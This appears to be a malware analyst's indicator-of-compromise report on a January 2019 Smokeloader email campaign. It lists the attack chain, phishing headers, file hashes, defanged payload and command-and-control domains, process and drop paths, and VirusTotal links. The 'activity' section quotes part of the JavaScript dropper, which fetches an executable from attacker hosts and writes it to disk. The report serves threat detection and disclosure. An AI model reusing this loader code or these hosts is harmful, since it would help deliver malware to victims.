#smokeloader_110119

#IOC #OptiData #VR #smokeloader #WSH #LZH

https://pastebin.com/b8PkhMyN

previous contact:
https://pastebin.com/hkskwKvc
https://pastebin.com/JmthzrL4
https://pastebin.com/1scwT0f8
https://pastebin.com/MP3kCSSh

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/

attack_vector
--------------
email attach (lzh) > js > WSH > GET 2 URL > AppData\Roaming\Microsoft\Windows\Templates\*.exe

email_headers
--------------
Received: from mx.fm.ukrtelecom.ua (mx.fm.ukrtelecom.ua [82.207.79.108])
	by srv8.victim1.com for <user0@org7.victim1.com>;
	Fri, 11 Jan 2019 03:25:51 +0200 (EET) (envelope-from zagviddil@ukrpost.ua)
Received: from mail5.ukrpost.ua (mail5.ukrpost.ua [82.207.79.5]) by mx.fm.ukrtelecom.ua
Received: from [37.120.146.92] (helo=37.120.146.92)
	by mail5.ukrpost.ua (envelope-from <zagviddil@ukrpost.ua>)
From: "Иван Богданович <zagviddil@ukrpost.ua>"
Subject: Счет фактура за текущий месяц
To: "user0" <user0@org7.victim1.com>
Reply-To: "Иван Богданович <zagviddil@ukrpost.ua>" <inter4room@ukr.net>

files
--------------
SHA-256	ecac0091a03fbf8f1583254af92c850a3740c79ecd22659ab0ec7447b399bdbd
File name	Счета по текущему 11.01.2019.lzh	[LHarc 1.x/ARX archive data [lh0]]
File size	42 KB

SHA-256	3b97d0ef429100c6ec88d1ecca237eff66887db9e76223ce586f47f5fc1b568a
File name	Pax. 052-2019.ods			[OpenDocument Spreadsheet]
File size	15.71 KB

SHA-256	69a9d87277f8cd364f68187c08235b4d61c47b7021e87f9d742c55a03223289c
File name	Pax. 052-2019.js			[ASCII text]
File size	26.21 KB

SHA-256	fd630b999bda6ccd94747d8c33869c3bfb20a0ab546464821a67509d2a79d38a
File name	liter.exe				[PE32 executable (GUI) Intel 80386, for MS Windows]
File size	205 KB

activity
**************

dropper_script:
wsh = new ActiveXObject("wscript.shell");
path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
HTTP = new ActiveXObject("MSXML2.XMLHTTP"); Stream = new ActiveXObject("ADODB.Stream");
HTTP.Open("GET", "musicaustriallc{.} ru/instadoc/liter.exe", false);
...
else { HTTP.Open("GET", "telemagistralinc{.} info/instadoc/liter.exe", false);
...

PL	musicaustriallc{.} ru/instadoc/liter.exe
	telemagistralinc{.} info/instadoc/liter.exe

C2      aviatorssm{.} bit/

netwrk
--------------
176.53.161.28	musicaustriallc{.} ru	GET /instadoc/liter.exe HTTP/1.1 	Mozilla/4.0
This program cannot be run in DOS mode.

comp
--------------
wscript.exe	968	TCP	176.53.161.28	80	ESTABLISHED

proc
--------------
C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 052-2019.js
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\250221.exe

persist
--------------
n/a (detects vm, sleeps)

drop
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\250221.exe

# # #
https://www.virustotal.com/#/file/ecac0091a03fbf8f1583254af92c850a3740c79ecd22659ab0ec7447b399bdbd/details
https://www.virustotal.com/#/file/3b97d0ef429100c6ec88d1ecca237eff66887db9e76223ce586f47f5fc1b568a/details
https://www.virustotal.com/#/file/69a9d87277f8cd364f68187c08235b4d61c47b7021e87f9d742c55a03223289c/details
https://www.virustotal.com/#/url/e9094e4d3a4b8c94425d33c6c423fc5e7ad9aba7f45ab4931d215aadb7d9111d/details
https://www.virustotal.com/#/file/fd630b999bda6ccd94747d8c33869c3bfb20a0ab546464821a67509d2a79d38a/details
https://analyze.intezer.com/#/analyses/051ebb20-165d-40b6-923d-a6eb78c9cdb7

VR

@